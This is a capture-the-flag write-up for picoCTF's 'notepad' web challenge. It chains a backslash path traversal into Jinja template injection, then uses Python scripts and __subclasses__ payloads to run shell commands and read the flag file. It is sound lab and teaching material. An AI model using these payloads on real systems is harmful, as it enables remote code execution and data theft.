# notepad

> This note-taking site seems a bit off.

This is a very interesting line in the given source code:

```
f"static/{url_fix(content[:128])}-{token_urlsafe(8)}.html"
```

With those first 128 tokens we control, we can try to put our file contents in a different directory. However, `url_fix` does block `/` characters... Luckily, they put in this line:

```
s = _to_str(s, charset, "replace").replace("\\", "/")
```

Backslashes are usually invalid in URLs, so this line is really strange... and very useful! Using these backslashes to denote directories, we can force our note to be saved in `errors/`, and hence, also force template code inside to be parsed! For example, using this payload:

```
..\templates\errors\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabcdefg
This is a test {{request}}
```

After submitting this we can surf to the new error page, `https://notepad.mars.picoctf.net/?error=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabcdefg-x_3vhZ4pt4c`, and the template string is being parsed! So we have ourselves a **template injection vulnerability**.

Let's try to automate this with a script before continuing to explore our possibilities:

In [11]:
import requests
import re
import html
from pathlib import Path
from urllib.parse import urlparse


def submit_payload(template_str):
  file_url = "..\\templates\\errors\\".ljust(128, 'a')
  data = {
    "content": f"{file_url}\nAAAA{template_str}BBBB"
  }
  r = requests.post("https://notepad.mars.picoctf.net/new", data = data)
  new_file_name = Path(urlparse(r.url).path).stem
  
  r = requests.get(f"https://notepad.mars.picoctf.net?error={new_file_name}")
  marker_regex = re.compile(f"AAAA(.*)BBBB")
  match = marker_regex.search(r.text)
  print(html.unescape(match.group(1)))

submit_payload("abcd {{request}}")

abcd <Request 'http://notepad.mars.picoctf.net/?error=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-pHwxoCtJQiU' [GET]>


 Now, on to exploiting this template injection. I used [this trick](https://gynvael.coldwind.pl/n/python_sandbox_escape) with URL parameters to be able to use any string I need. This is necessary because I will need `_`-characters to get into the `__class__` object and call arbitrary methods, but these are usually not allowed. Go read the linked blogpost!

The modified method looks like this:

In [17]:
def submit_payload(template_str, params):
  file_url = "..\\templates\\errors\\".ljust(128, 'a')
  data = {
    "content": f"{file_url}\nAAAA{template_str}BBBB"
  }
  r = requests.post("https://notepad.mars.picoctf.net/new", data = data)
  new_file_name = Path(urlparse(r.url).path).stem
  
  r = requests.get(f"https://notepad.mars.picoctf.net?error={new_file_name}&{params}")
  marker_regex = re.compile(f"AAAA(.*)BBBB")
  match = marker_regex.search(r.text)
  print(html.unescape(match.group(1)))

submit_payload("abcd {{request.args.get('p1')}}", "p1=hello")

abcd hello


Now I just have to dig around a bit in `__class__` and `__subclasses__` on the objects, to find the required method, and find the required flag file:

In [19]:
submit_payload("{{''[request.args.get('class')].mro()[1][request.args.get('subclasses')]()[273](['ls'],stdout=-1).communicate()}}", "class=__class__&subclasses=__subclasses__")

(b'app.py\nflag-c8f5526c-4122-4578-96de-d7dd27193798.txt\nstatic\ntemplates\n', None)


And now I can also read that file:

In [20]:
submit_payload("{{''[request.args.get('class')].mro()[1][request.args.get('subclasses')]()[273](['cat','flag-c8f5526c-4122-4578-96de-d7dd27193798.txt'],stdout=-1).communicate()}}", "class=__class__&subclasses=__subclasses__")

(b'picoCTF{styl1ng_susp1c10usly_s1m1l4r_t0_p4steb1n}\n', None)
